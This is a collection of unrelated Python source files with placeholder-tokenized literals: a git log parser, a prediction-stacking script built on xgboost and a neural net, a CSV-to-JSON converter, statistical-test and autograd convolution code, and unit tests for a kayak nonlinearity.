<s> from datetime import datetime <EOL> import re <EOL> import math <EOL> import fnmatch <EOL> from functools import reduce <EOL> class GitLogParser : <EOL> COMMIT_REGEXP = r'<STR_LIT>' <EOL> AUTHOR_REGEXP = r'<STR_LIT>' <EOL> DATE_REGEXP = r'<STR_LIT>' <EOL> FILE_REGEXP = r'<STR_LIT>' <EOL> GIT_DATE_FORMAT = '<STR_LIT>' <EOL> def parse_stream ( self , input_stream , ignore = [ ] , encoding = '<STR_LIT:utf-8>' ) : <EOL> return self . parse ( input_stream . decode ( encoding ) , ignore = ignore ) <EOL> def parse ( self , input_string , ignore = [ ] ) : <EOL> commit_strings = input_string [ <NUM_LIT:7> : ] . split ( "<STR_LIT>" ) <EOL> commits = [ self . parse_commit ( commit , ignore = ignore ) for commit in commit_strings ] <EOL> return commits <EOL> def parse_commit ( self , commit_string , ignore = [ ] ) : <EOL> lines = commit_string . split ( "<STR_LIT:\n>" ) <EOL> commit = reduce ( ( lambda d , l : self . parse_line ( d , l , ignore = ignore ) ) , lines , { } ) <EOL> return commit <EOL> def parse_line ( self , commit_dict , line , ignore = [ ] ) : <EOL> attribute = self . try_fetch_attribute ( line , ignore = ignore ) <EOL> if attribute == None : <EOL> return commit_dict <EOL> if attribute [ <NUM_LIT:0> ] == '<STR_LIT:count>' : <EOL> commit_dict [ '<STR_LIT:count>' ] = commit_dict . get ( '<STR_LIT:count>' , <NUM_LIT:0> ) + attribute [ <NUM_LIT:1> ] <EOL> else : <EOL> commit_dict [ attribute [ <NUM_LIT:0> ] ] = attribute [ <NUM_LIT:1> ] <EOL> return commit_dict <EOL> def try_fetch_attribute ( self , commit_line , ignore = [ ] ) : <EOL> if re . match ( self . COMMIT_REGEXP , commit_line ) : <EOL> return ( '<STR_LIT>' , commit_line ) <EOL> elif re . match ( self . AUTHOR_REGEXP , commit_line ) : <EOL> return ( '<STR_LIT>' , re . match ( self . AUTHOR_REGEXP , commit_line ) . group ( <NUM_LIT:1> ) ) <EOL> elif re . match ( self . DATE_REGEXP , commit_line ) : <EOL> date_str = re . match ( self . DATE_REGEXP , commit_line ) . 
group ( <NUM_LIT:1> ) <EOL> return ( '<STR_LIT:date>' , datetime . strptime ( date_str , self . GIT_DATE_FORMAT ) ) <EOL> elif re . match ( self . FILE_REGEXP , commit_line ) : <EOL> filename = re . match ( self . FILE_REGEXP , commit_line ) . group ( <NUM_LIT:3> ) <EOL> for pattern in ignore : <EOL> if fnmatch . fnmatch ( filename , pattern ) : <EOL> return None <EOL> return ( '<STR_LIT:count>' , <NUM_LIT:1> ) <EOL> return None <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> pass </s>
# Python 2 script (izip, print statements): blends several base-model
# prediction files into one submission, either by cross-validated stacking
# (neural net or xgboost) or by simple averaging. All functions below read
# the module-global `args` parsed in the __main__ guard.
from itertools import izip
from math import log, exp
from datetime import datetime
from csv import DictReader
from itertools import izip
import argparse, random
from util import write_dump, read_dump
import numpy as np
from sklearn.metrics import log_loss
import xgboost as xgb
import theano
import lasagne
from lasagne import layers
from lasagne.objectives import Objective
from lasagne.layers import DenseLayer
from lasagne.layers import DropoutLayer
from lasagne.layers import InputLayer
from lasagne.nonlinearities import identity, sigmoid, tanh, rectify, linear
from lasagne.nonlinearities import softmax
from lasagne.updates import nesterov_momentum, adagrad
from nolearn.lasagne import NeuralNet
from nolearn.lasagne import BatchIterator


def get_nn_model(shape):
    """Build a small 2-hidden-layer nolearn/lasagne classifier.

    `shape` is the training design-matrix shape; only shape[1] (feature
    count) is used, for the input layer width.
    """
    np.random.seed(<NUM_LIT:9>)  # fixed seed so weight init is reproducible
    model = NeuralNet(
        layers=[
            ('<STR_LIT:input>', layers.InputLayer),
            ('<STR_LIT>', layers.DenseLayer),
            ('<STR_LIT>', layers.DenseLayer),
            ('<STR_LIT>', layers.DenseLayer),
        ],
        input_shape=(None, shape[<NUM_LIT:1>]),
        hidden1_num_units=<NUM_LIT:16>,
        hidden1_nonlinearity=sigmoid,
        hidden2_num_units=<NUM_LIT:8>,
        hidden2_nonlinearity=sigmoid,
        output_nonlinearity=softmax,  # 2-way softmax -> binary probabilities
        output_num_units=<NUM_LIT:2>,
        update=adagrad,
        update_learning_rate=theano.shared(np.float32(<NUM_LIT:0.1>)),
        on_epoch_finished=[
        ],
        use_label_encoder=False,
        batch_iterator_train=BatchIterator(batch_size=<NUM_LIT>),
        regression=False,
        max_epochs=<NUM_LIT>,
        verbose=<NUM_LIT:1>,
        eval_size=<NUM_LIT:0.0>,  # no internal validation split
    )
    return model


def read_true():
    """Yield the integer label taken from the first character of each line."""
    with open("<STR_LIT>") as f:
        for line in f:
            y = int(line[<NUM_LIT:0>])
            yield y


def read_preds(all_preds):
    """Open every prediction file and yield row-aligned float tuples.

    NOTE(review): the file handles are never closed explicitly; they live
    until the generator (and interpreter) exits.
    """
    all_fh = []
    for pred in all_preds:
        all_fh.append(open(pred))
    for preds in izip(*all_fh):
        yield map(float, preds)


def logloss(p, y):
    """Binary log-loss of probability `p` against label `y`, with clipping
    away from 0/1 to keep log() finite."""
    p = max(min(p, <NUM_LIT:1.> - <NUM_LIT>), <NUM_LIT>)
    return -log(p) if y == <NUM_LIT:1.> else -log(<NUM_LIT:1.> - p)


def logit(x):
    # Logistic squashing; companion/inverse of relogit below.
    return <NUM_LIT:1.> / (<NUM_LIT:1.> + exp(x))


def relogit(x):
    # Map a probability back to log-odds space (clipped away from 0).
    return log((<NUM_LIT:1.> - x) / max(x, <NUM_LIT>))


def stack_preds(preds):
    """Combine one row of base-model probabilities into a single value.

    NOTE(review): three blends are computed -- geometric mean (res),
    arithmetic mean (res2), logit-average (res3) -- but only the
    arithmetic mean is returned; res and res3 are dead ends kept from
    experimentation.
    """
    res = <NUM_LIT:1>
    res2 = <NUM_LIT:0>
    res3 = <NUM_LIT:0>
    # Uniform weights over the base models.
    ratio = [<NUM_LIT:1.0> / len(preds) for i in range(len(preds))]
    for p, r in zip(preds, ratio):
        res *= p
        res2 += p * r
        res3 += relogit(p)
    res = res ** (<NUM_LIT:1.0> / len(preds))
    res3 = logit(res3 / len(preds))
    return res2


def read_sample(path):
    """Yield the integer id column from a sample-submission CSV."""
    for t, row in enumerate(DictReader(open(path))):
        yield int(row["<STR_LIT>"])


def get_train_data():
    """Stream labels and base predictions, splitting rows into a stacking
    train set (first block) and holdout set (remainder).

    Depending on `args.model`, train-set features are the raw log-odds or
    log-odds plus small uniform jitter (a regularisation trick).
    """
    all_preds = [
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
    ]
    tr_X, tr_y_true = [], []
    tr_loss, te_loss = <NUM_LIT:0.0>, <NUM_LIT:0.0>
    te_X, te_y_true = [], []
    avg_ctr = <NUM_LIT:0>
    loss = <NUM_LIT:0>
    delta = <NUM_LIT:1>
    now = datetime.now()
    random.seed(<NUM_LIT:9>)  # reproducible jitter
    for t, (y, preds) in enumerate(izip(read_true(), read_preds(all_preds))):
        avg_p = stack_preds(preds)
        avg_ctr += avg_p
        l = logloss(avg_p, y)
        if t < <NUM_LIT>:  # first block of rows -> stacker train set
            if "<STR_LIT>" in args.model:
                preds = map(lambda x: relogit(x), preds)
            elif "<STR_LIT>" in args.model:
                preds = map(lambda x: relogit(x) + (random.random() - <NUM_LIT:0.5>) / <NUM_LIT:10>, preds)
            elif "<STR_LIT>" in args.model:
                preds = map(lambda x: relogit(x) + (random.random() - <NUM_LIT:0.5>) / <NUM_LIT:10>, preds)
            tr_X.append(preds)
            tr_y_true.append(y)
            tr_loss += l
        else:  # remainder -> holdout, always un-jittered log-odds
            preds = map(lambda x: relogit(x), preds)
            te_X.append(preds)
            te_y_true.append(y)
            te_loss += l
        loss += l
        if t == delta:  # progress report at powers of two
            print "<STR_LIT>" % (t, datetime.now() - now, loss / (t + <NUM_LIT:1>))
            delta *= <NUM_LIT:2>
    print loss / (t + <NUM_LIT:1>), avg_ctr / (t + <NUM_LIT:1>)
    print "<STR_LIT>", len(tr_X), tr_loss / len(tr_X)
    if te_X:
        print "<STR_LIT>", len(te_X), te_loss / len(te_X)
    return tr_X, tr_y_true, te_X, te_y_true


def cv_method():
    """Train the stacker (nn or xgb per args.model), dump it, and score the
    holdout block if one exists."""
    tr_X, tr_y_true, te_X, te_y_true = get_train_data()
    if "<STR_LIT>" in args.model:
        tr_X = np.array(tr_X).astype(np.float32)
        tr_y_true = np.array(tr_y_true).astype(np.int32)
        model = get_nn_model(tr_X.shape)
        model.fit(tr_X, tr_y_true)
        write_dump("<STR_LIT>" % args.model, model)
        if te_X:
            te_X = np.array(te_X).astype(np.float32)
            preds = model.predict_proba(te_X)[:, <NUM_LIT:1>]
            np.savetxt("<STR_LIT>", preds)
            print log_loss(te_y_true, preds)
    elif "<STR_LIT>" in args.model:
        dtrain = xgb.DMatrix(tr_X, label=tr_y_true)
        # NOTE(review): dtest is only created under this predict mode; if
        # te_X is non-empty in another mode the watchlist below would hit
        # an undefined name. Indentation reconstructed -- confirm.
        if args.predict == "<STR_LIT>":
            if te_X:
                dtest = xgb.DMatrix(te_X, label=te_y_true)
        param = {
            '<STR_LIT>': <NUM_LIT:3>,
            '<STR_LIT>': <NUM_LIT:0.1>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': '<STR_LIT>',
            "<STR_LIT>": "<STR_LIT>",
            "<STR_LIT>": <NUM_LIT:9>,
        }
        if te_X:
            watchlist = [(dtrain, '<STR_LIT:train>'), (dtest, "<STR_LIT>")]
        else:
            watchlist = [(dtrain, '<STR_LIT:train>'), ]
        num_round = <NUM_LIT>
        bst = xgb.train(param, dtrain, num_round, watchlist)
        bst.save_model("<STR_LIT>" % args.model)
        if te_X:
            preds = bst.predict(dtest)
            np.savetxt("<STR_LIT>", preds)


def stack_method():
    """Load a previously trained stacker (or plain-average) and write the
    final submission file."""
    if "<STR_LIT>" in args.model:
        all_preds = [
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
        ]
    else:
        all_preds = [
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
        ]
    delta = <NUM_LIT:1>
    now = datetime.now()
    X = []
    true_y = []
    for t, preds in enumerate(read_preds(all_preds)):
        # nn/xgb stackers were trained on log-odds features.
        if "<STR_LIT>" in args.model or "<STR_LIT>" in args.model:
            preds = map(lambda x: relogit(x), preds)
        X.append(preds)
        true_y.append(<NUM_LIT:0>)  # dummy labels; only features matter here
        if t == delta:
            print "<STR_LIT>" % (t, datetime.now() - now)
            delta *= <NUM_LIT:2>
    if "<STR_LIT>" in args.model:
        model = read_dump("<STR_LIT>" % args.model)
        X = np.array(X).astype(np.float32)
        preds = model.predict_proba(X)[:, <NUM_LIT:1>]
    elif "<STR_LIT>" in args.model:
        dtrain = xgb.DMatrix(np.array(X), label=true_y)
        bst = xgb.Booster({'<STR_LIT>': <NUM_LIT:9>})
        bst.load_model("<STR_LIT>" % args.model)
        preds = bst.predict(dtrain)
    elif args.model == "<STR_LIT>":
        X = np.array(X).astype(np.float32)
        preds = np.mean(X, <NUM_LIT:1>)  # plain row-average fallback
    with open("<STR_LIT>" % args.model, '<STR_LIT:w>') as outfile:
        outfile.write('<STR_LIT>')  # header row
        avg_p = <NUM_LIT:0>
        cnt = <NUM_LIT:0>
        for ID, p in izip(read_sample("<STR_LIT>"), preds):
            avg_p += p
            cnt += <NUM_LIT:1>
            outfile.write('<STR_LIT>' % (ID, str(p)))
    print cnt, avg_p / cnt


def main():
    """Dispatch on args.predict: rescale-and-copy, cross-validate, or stack."""
    if args.predict == "<STR_LIT>":
        ratio = <NUM_LIT:1.0>  # global probability rescaling factor (identity here)
        with open(args.output, '<STR_LIT:w>') as outfile:
            outfile.write('<STR_LIT>')
            avg_p = <NUM_LIT:0>
            cnt = <NUM_LIT:0>
            for ID, preds in izip(read_sample("<STR_LIT>"), read_preds([args.input])):
                preds[<NUM_LIT:0>] = min(preds[<NUM_LIT:0>] * ratio, <NUM_LIT:1.0>)
                avg_p += preds[<NUM_LIT:0>]
                cnt += <NUM_LIT:1>
                outfile.write('<STR_LIT>' % (ID, str(preds[<NUM_LIT:0>])))
        print avg_p / cnt
    elif args.predict == "<STR_LIT>":
        cv_method()
    elif args.predict == "<STR_LIT>":
        stack_method()


if __name__ == '<STR_LIT:__main__>':
    parser = argparse.ArgumentParser(description='<STR_LIT>')
    parser.add_argument('<STR_LIT>', type=str, default="<STR_LIT>")
    parser.add_argument('<STR_LIT>', type=str, default=None)
    parser.add_argument('<STR_LIT>', type=str, default=None)
    parser.add_argument('<STR_LIT>', type=str, default="<STR_LIT>")
    args = parser.parse_args()  # module-global, read by all functions above
    main()
<s> import os , sys , string , json , csv <EOL> from collections import OrderedDict <EOL> def csv2mlvs ( csvfile , output_dir = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> response_dict = OrderedDict ( ) <EOL> print "<STR_LIT>" , csvfile , "<STR_LIT>" , output_dir , "<STR_LIT:.>" <EOL> csvhandle = csv . reader ( open ( csvfile , '<STR_LIT:rb>' ) , delimiter = '<STR_LIT:U+002C>' ) <EOL> rowindex = <NUM_LIT:0> <EOL> error_list = [ ] <EOL> try : <EOL> os . mkdir ( output_dir ) <EOL> print "<STR_LIT>" , output_dir , "<STR_LIT>" <EOL> except : <EOL> print "<STR_LIT>" , output_dir , "<STR_LIT>" <EOL> for row in csvhandle : <EOL> if rowindex == <NUM_LIT:0> : <EOL> column_headers = row <EOL> cleaned_headers = [ ] <EOL> for c in column_headers : <EOL> c = c . replace ( "<STR_LIT:.>" , "<STR_LIT>" ) <EOL> c = c . replace ( "<STR_LIT:(>" , "<STR_LIT>" ) <EOL> c = c . replace ( "<STR_LIT:)>" , "<STR_LIT>" ) <EOL> c = c . replace ( "<STR_LIT:$>" , "<STR_LIT:->" ) <EOL> c = c . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) <EOL> cleaned_headers . append ( c ) <EOL> else : <EOL> record = dict ( zip ( cleaned_headers , row ) ) <EOL> state_dir = os . path . join ( output_dir , record [ "<STR_LIT:state>" ] ) <EOL> try : <EOL> os . mkdir ( state_dir ) <EOL> print "<STR_LIT>" , state_dir , "<STR_LIT>" <EOL> except : <EOL> pass <EOL> lt_dir = os . path . join ( state_dir , record [ "<STR_LIT>" ] ) <EOL> try : <EOL> os . mkdir ( lt_dir ) <EOL> print "<STR_LIT>" , lt_dir , "<STR_LIT>" <EOL> except : <EOL> pass <EOL> fn = "<STR_LIT>" % ( record [ "<STR_LIT>" ] ) <EOL> fp = os . path . join ( lt_dir , fn ) <EOL> ofile = open ( fp , '<STR_LIT:w>' ) <EOL> ofile . writelines ( json . dumps ( record , indent = <NUM_LIT:4> ) ) <EOL> ofile . 
close ( ) <EOL> rowindex += <NUM_LIT:1> <EOL> if error_list : <EOL> response_dict [ '<STR_LIT>' ] = rowindex - <NUM_LIT:1> <EOL> response_dict [ '<STR_LIT>' ] = len ( error_list ) <EOL> response_dict [ '<STR_LIT>' ] = error_list <EOL> response_dict [ '<STR_LIT:code>' ] = <NUM_LIT> <EOL> response_dict [ '<STR_LIT:message>' ] = "<STR_LIT>" <EOL> else : <EOL> response_dict [ '<STR_LIT>' ] = rowindex - <NUM_LIT:1> <EOL> response_dict [ '<STR_LIT:code>' ] = <NUM_LIT:200> <EOL> response_dict [ '<STR_LIT:message>' ] = "<STR_LIT>" <EOL> return response_dict <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> if len ( sys . argv ) != <NUM_LIT:3> : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> csv_file = sys . argv [ <NUM_LIT:1> ] <EOL> output_dir = sys . argv [ <NUM_LIT:2> ] <EOL> result = csv2mlvs ( csv_file , output_dir ) <EOL> print json . dumps ( result , indent = <NUM_LIT:4> ) </s>
from kcbo.utils import listify, dictify
import numpy as np
from collections import Iterable
from itertools import chain


class statistic(object):
    """Decorator that tags a method as a named test statistic.

    The flags record how the statistic should be computed and reported:
    whether it yields a sampled distribution or a point estimate, and
    whether it applies to key pairs or to individual groups.
    """

    def __init__(self, statistic_name=None, is_distribution=False,
                 is_estimate=False, pairwise=False, individual=False, **kwargs):
        self.statistic_name = statistic_name
        self.is_distribution = is_distribution
        self.is_estimate = is_estimate
        self.pairwise = pairwise
        self.individual = individual
        self.kwargs = kwargs

    def __call__(self, f):
        # Stamp the metadata onto the function object itself so
        # StatisticalTest.initialize_statistics can discover it via dir().
        f.is_statistic = True
        f.statistic_name = self.statistic_name
        f.is_distribution = self.is_distribution
        f.is_estimate = self.is_estimate
        f.pairwise = self.pairwise
        f.individual = self.individual
        if self.is_estimate:
            # How to reduce a sampled distribution to a point estimate.
            f.estimate_function = self.kwargs.get('<STR_LIT>', np.mean)
        return f


class StatisticalTest(object):
    """Base class for Bayesian statistical tests.

    Subclasses implement initialize_test/run_model/summary and declare
    their statistics with the @statistic decorator above.
    """
    TYPE = '<STR_LIT>'
    ALLOW_COMPLETED_KEYS = True

    def __init__(self, *args, **kwargs):
        self.data = None
        self.completed = []   # keys whose model has already been run
        self.keys = None
        self.groups = None
        self.initialize_statistics()
        self.initialize_test(*args, **kwargs)

    def initialize_test(self, *args, **kwargs):
        """Subclass hook: bind data and configure the test."""
        raise NotImplementedError()

    def initialize_statistics(self):
        """Discover all @statistic-decorated methods on this instance."""
        def is_statistic(obj, f):
            # Probe each attribute for the decorator's marker; anything
            # without it raises AttributeError and is filtered out.
            # NOTE(review): the bare `except:` also swallows errors raised
            # by property getters during the probe -- confirm intended.
            try:
                obj.__getattribute__(f).is_statistic
                return obj.__getattribute__(f).statistic_name, obj.__getattribute__(f)
            except:
                return None
        self.statistics = {}
        for value in map(lambda func: is_statistic(self, func), dir(self)):
            if value is not None:
                self.statistics[value[<NUM_LIT:0>]] = value[<NUM_LIT:1>]
        self.distributions = {
            k: v for (k, v) in self.statistics.items() if v.is_distribution}
        # NOTE(review): map() used purely for its side effect -- this is a
        # no-op on Python 3 where map is lazy; works only under Python 2.
        map(lambda s: setattr(self, s, self.statistics[s]), self.statistics)

    def run_model(self, *args, **kwargs):
        """Subclass hook: run inference for one key."""
        raise NotImplementedError()

    @staticmethod
    def compute_interval(distribution, alpha):
        """Equal-tailed credible interval of `distribution` at level alpha."""
        alpha_lower, alpha_upper = (alpha / <NUM_LIT>, <NUM_LIT:1> - alpha / <NUM_LIT>)
        return np.percentile(distribution, <NUM_LIT:100> * alpha_lower), np.percentile(distribution, <NUM_LIT:100> * alpha_upper)

    def compute_statistic(self, keys=None, **kwargs):
        """Evaluate every applicable statistic for each key.

        Pairwise statistics apply to iterable non-string keys found in
        self.keys; individual statistics apply to everything else.
        Distribution statistics additionally get an interval entry, and
        estimate+distribution statistics get a point-estimate entry.
        """
        if keys is None:
            keys = list(chain(self.keys, self.groups)) or []
        data = {}
        for key in keys:
            key_data = {}
            # NOTE(review): complete_key() always returns None, so this
            # condition is always true and run_model runs for every key on
            # every call -- possibly intended to be a membership test.
            if not self.complete_key(key):
                self.run_model(key)
            if isinstance(key, Iterable) and not type(key) is str and key in self.keys:
                applicable_statistics = {k: v for (k, v) in self.statistics.items() if v.pairwise}
            else:
                applicable_statistics = {k: v for (k, v) in self.statistics.items() if v.individual}
            for name, statistic in applicable_statistics.items():
                key_data[name] = statistic(key)
                if statistic.is_distribution:
                    key_data["<STR_LIT>" % name] = self.compute_interval(key_data[name], <NUM_LIT>)
                if statistic.is_estimate and statistic.is_distribution:
                    key_data["<STR_LIT>" % name] = statistic.estimate_function(key_data[name])
            data[key] = key_data
        return data

    def generate_tables(self, data):
        """Subclass hook: render computed statistics as output tables."""
        raise NotImplementedError()

    def compute_statistics(self, *args, **kwargs):
        """Alias for compute_statistic (plural convenience name)."""
        return self.compute_statistic(*args, **kwargs)

    def complete_key(self, key):
        """Record `key` as completed. Always returns None (see note in
        compute_statistic)."""
        if key not in self.completed:
            self.completed.append(key)

    def summary(self):
        """Subclass hook: human-readable summary of the test results."""
        raise NotImplementedError()
<s> import numpy as np <EOL> import numpy . random as npr <EOL> from guppy import hpy <EOL> import sys <EOL> sys . path . append ( '<STR_LIT:..>' ) <EOL> import kayak <EOL> def check_NodeMemory ( ) : <EOL> np_A = npr . randn ( <NUM_LIT:5> , <NUM_LIT:6> ) <EOL> A = kayak . Parameter ( np_A ) <EOL> N = int ( <NUM_LIT> ) <EOL> h = hpy ( ) <EOL> h . setref ( ) <EOL> for i in xrange ( N ) : <EOL> A = kayak . Identity ( A ) <EOL> print "<STR_LIT>" <EOL> print h . heap ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> check_NodeMemory ( ) </s>
# Test suite for kayak.NExp, the soft-thresholding nonlinearity
# 1 - exp(-|x|): value checks against the closed form, plus numerical
# gradient checks, for scalar/vector/matrix/tensor inputs with and
# without a weight factor. NUM_TRIALS, close_float, MAX_GRAD_DIFF come
# from the package's test helpers (`from . import *`).
import numpy as np
import numpy.random as npr
import kayak
from . import *


def test_scalar_value():
    """NExp of a scalar equals 1 - exp(-|x|)."""
    npr.seed(<NUM_LIT:1>)
    for ii in xrange(NUM_TRIALS):
        np_X = npr.randn()
        X = kayak.Parameter(np_X)
        out = kayak.NExp(X)
        assert close_float(out.value, <NUM_LIT:1.0> - np.exp(-np.abs(np_X)))


def test_scalar_grad():
    """Numerical gradient check for scalar NExp."""
    npr.seed(<NUM_LIT:2>)
    for ii in xrange(NUM_TRIALS):
        while True:
            np_X = npr.randn()
            # Reject draws near 0: NExp is not differentiable there, so
            # finite-difference checks would be unreliable.
            if np.abs(np_X) > <NUM_LIT:0.1>:
                break
        X = kayak.Parameter(np_X)
        out = kayak.NExp(X)
        assert kayak.util.checkgrad(X, out) < MAX_GRAD_DIFF


def test_scalar_value_2():
    """Weighted scalar value: weight scales the closed form."""
    npr.seed(<NUM_LIT:3>)
    for ii in xrange(NUM_TRIALS):
        np_X = npr.randn()
        wt = np.exp(npr.randn())  # strictly positive random weight
        X = kayak.Parameter(np_X)
        out = kayak.NExp(X, weight=wt)
        assert close_float(out.value, wt * (<NUM_LIT:1.0> - np.exp(-np.abs(np_X))))


def test_scalar_grad_2():
    """Numerical gradient check for weighted scalar NExp."""
    npr.seed(<NUM_LIT:4>)
    for ii in xrange(NUM_TRIALS):
        while True:
            np_X = npr.randn()
            if np.abs(np_X) > <NUM_LIT:0.1>:
                break
        wt = np.exp(npr.randn())
        X = kayak.Parameter(np_X)
        out = kayak.NExp(X, weight=wt)
        assert kayak.util.checkgrad(X, out) < MAX_GRAD_DIFF


def test_vector_value():
    """Vector input: NExp sums elementwise 1 - exp(-|x|), scaled by weight."""
    npr.seed(<NUM_LIT:5>)
    for ii in xrange(NUM_TRIALS):
        np_X = npr.randn(<NUM_LIT:10>, <NUM_LIT:1>)
        wt = np.exp(npr.randn())
        X = kayak.Parameter(np_X)
        out = kayak.NExp(X, weight=wt)
        assert close_float(out.value, wt * np.sum(<NUM_LIT:1.0> - np.exp(-np.abs(np_X))))


def test_vector_grad():
    npr.seed(<NUM_LIT:6>)
    for ii in xrange(NUM_TRIALS):
        while True:
            # NOTE(review): this draws a SCALAR, not the (10, 1) vector used
            # by test_vector_value, so the name overstates the coverage (the
            # np.all() check suggests an array was intended). Naively
            # switching to npr.randn(10, 1) would make this rejection loop
            # (all elements must exceed 0.1 in magnitude) terminate only
            # rarely, so a real fix needs a different sampling scheme --
            # flagged here rather than changed.
            np_X = npr.randn()
            if np.all(np.abs(np_X) > <NUM_LIT:0.1>):
                break
        wt = np.exp(npr.randn())
        X = kayak.Parameter(np_X)
        out = kayak.NExp(X, weight=wt)
        assert kayak.util.checkgrad(X, out) < MAX_GRAD_DIFF


def test_matrix_value():
    """Matrix input: summed weighted closed form, as above."""
    npr.seed(<NUM_LIT:7>)
    for ii in xrange(NUM_TRIALS):
        np_X = npr.randn(<NUM_LIT:10>, <NUM_LIT:20>)
        wt = np.exp(npr.randn())
        X = kayak.Parameter(np_X)
        out = kayak.NExp(X, weight=wt)
        assert close_float(out.value, wt * np.sum(<NUM_LIT:1.0> - np.exp(-np.abs(np_X))))


def test_matrix_grad():
    npr.seed(<NUM_LIT:8>)
    for ii in xrange(NUM_TRIALS):
        while True:
            # NOTE(review): scalar draw despite the "matrix" name -- same
            # issue as test_vector_grad above.
            np_X = npr.randn()
            if np.all(np.abs(np_X) > <NUM_LIT:0.1>):
                break
        wt = np.exp(npr.randn())
        X = kayak.Parameter(np_X)
        out = kayak.NExp(X, weight=wt)
        assert kayak.util.checkgrad(X, out) < MAX_GRAD_DIFF


def test_tensor_value():
    """3-d tensor input: summed weighted closed form, as above."""
    npr.seed(<NUM_LIT:9>)
    for ii in xrange(NUM_TRIALS):
        np_X = npr.randn(<NUM_LIT:10>, <NUM_LIT:20>, <NUM_LIT:5>)
        wt = np.exp(npr.randn())
        X = kayak.Parameter(np_X)
        out = kayak.NExp(X, weight=wt)
        assert close_float(out.value, wt * np.sum(<NUM_LIT:1.0> - np.exp(-np.abs(np_X))))


def test_tensor_grad():
    npr.seed(<NUM_LIT:10>)
    for ii in xrange(NUM_TRIALS):
        while True:
            # NOTE(review): scalar draw despite the "tensor" name -- same
            # issue as test_vector_grad above.
            np_X = npr.randn()
            if np.all(np.abs(np_X) > <NUM_LIT:0.1>):
                break
        wt = np.exp(npr.randn())
        X = kayak.Parameter(np_X)
        out = kayak.NExp(X, weight=wt)
        assert kayak.util.checkgrad(X, out) < MAX_GRAD_DIFF
# Generalised N-dimensional convolution for autograd, built on a strided
# view of B plus a single einsum contraction, with its gradient rules.
from __future__ import absolute_import
import scipy.signal
from autograd.core import primitive
import autograd.numpy as np
import numpy as npo
import itertools as it
from numpy.lib.stride_tricks import as_strided
from builtins import range, zip
from future.utils import iteritems


def prod(x):
    # Integer product of a shape-like sequence.
    return npo.prod(x, dtype=int)


@primitive
def convolve(A, B, axes=None, dot_axes=[(), ()], mode='<STR_LIT>'):
    """Convolve A with B along `axes`, contracting over `dot_axes`.

    `axes`/`dot_axes` are [A-axes, B-axes] pairs. When B is smaller than
    A along some convolution axis the arguments are swapped (convolution
    is symmetric) and the result transposed back into A-major order.
    """
    assert mode in ['<STR_LIT>', '<STR_LIT>'], "<STR_LIT>".format(mode)
    if axes is None:
        # Default: convolve over every axis of A, pairwise with B.
        axes = [list(range(A.ndim)), list(range(A.ndim))]
    wrong_order = any([B.shape[ax_B] < A.shape[ax_A] for ax_A, ax_B in zip(*axes)])
    if wrong_order:
        if mode == '<STR_LIT>' and not all([B.shape[ax_B] <= A.shape[ax_A] for ax_A, ax_B in zip(*axes)]):
            raise Exception("<STR_LIT>")
        elif mode != '<STR_LIT>' or B.size <= A.size:
            # Swap roles of A and B, then transpose the recursive result so
            # ignored-axis blocks come back in the caller's expected order.
            i1 = B.ndim - len(dot_axes[<NUM_LIT:1>]) - len(axes[<NUM_LIT:1>])
            i2 = i1 + A.ndim - len(dot_axes[<NUM_LIT:0>]) - len(axes[<NUM_LIT:0>])
            i3 = i2 + len(axes[<NUM_LIT:0>])
            ignore_B = list(range(i1))
            ignore_A = list(range(i1, i2))
            conv = list(range(i2, i3))
            return convolve(B, A, axes=axes[::-<NUM_LIT:1>], dot_axes=dot_axes[::-<NUM_LIT:1>], mode=mode).transpose(ignore_A + ignore_B + conv)
    if mode == '<STR_LIT>':
        B = pad_to_full(B, A, axes[::-<NUM_LIT:1>])
    # Build a zero-copy sliding-window view of B: for each convolution axis
    # an extra trailing axis of length |B-A|+1 (number of window offsets)
    # reuses that axis's stride, while the original axis is clipped to A's
    # length so each window lines up with A.
    B_view_shape = list(B.shape)
    B_view_strides = list(B.strides)
    flipped_idxs = [slice(None)] * A.ndim
    for ax_A, ax_B in zip(*axes):
        B_view_shape.append(abs(B.shape[ax_B] - A.shape[ax_A]) + <NUM_LIT:1>)
        B_view_strides.append(B.strides[ax_B])
        B_view_shape[ax_B] = A.shape[ax_A]
        flipped_idxs[ax_A] = slice(None, None, -<NUM_LIT:1>)
    B_view = as_strided(B, B_view_shape, B_view_strides)
    # Reverse A along each convolution axis (convolution = flipped correlation).
    A_view = A[flipped_idxs]
    all_axes = [list(axes[i]) + list(dot_axes[i]) for i in [<NUM_LIT:0>, <NUM_LIT:1>]]
    return einsum_tensordot(A_view, B_view, all_axes)


def einsum_tensordot(A, B, axes, reverse=False):
    """Tensordot via npo.einsum's integer-label interface.

    Axes paired in `axes` get a shared label >= A.ndim + B.ndim so einsum
    sums over them; all other axes keep distinct labels.
    """
    A_axnums = list(range(A.ndim))
    B_axnums = list(range(A.ndim, A.ndim + B.ndim))
    sum_axnum = A.ndim + B.ndim
    for i_sum, (i_A, i_B) in enumerate(zip(*axes)):
        A_axnums[i_A] = sum_axnum + i_sum
        B_axnums[i_B] = sum_axnum + i_sum
    return npo.einsum(A, A_axnums, B, B_axnums)


def pad_to_full(A, B, axes):
    """Zero-pad A by B-1 on both sides of each convolution axis, so a
    'valid'-style sweep over the padded A realises full-mode convolution."""
    A_pad = [(<NUM_LIT:0>, <NUM_LIT:0>)] * A.ndim
    for ax_A, ax_B in zip(*axes):
        A_pad[ax_A] = (B.shape[ax_B] - <NUM_LIT:1>,) * <NUM_LIT:2>
    return npo.pad(A, A_pad, mode='<STR_LIT>')


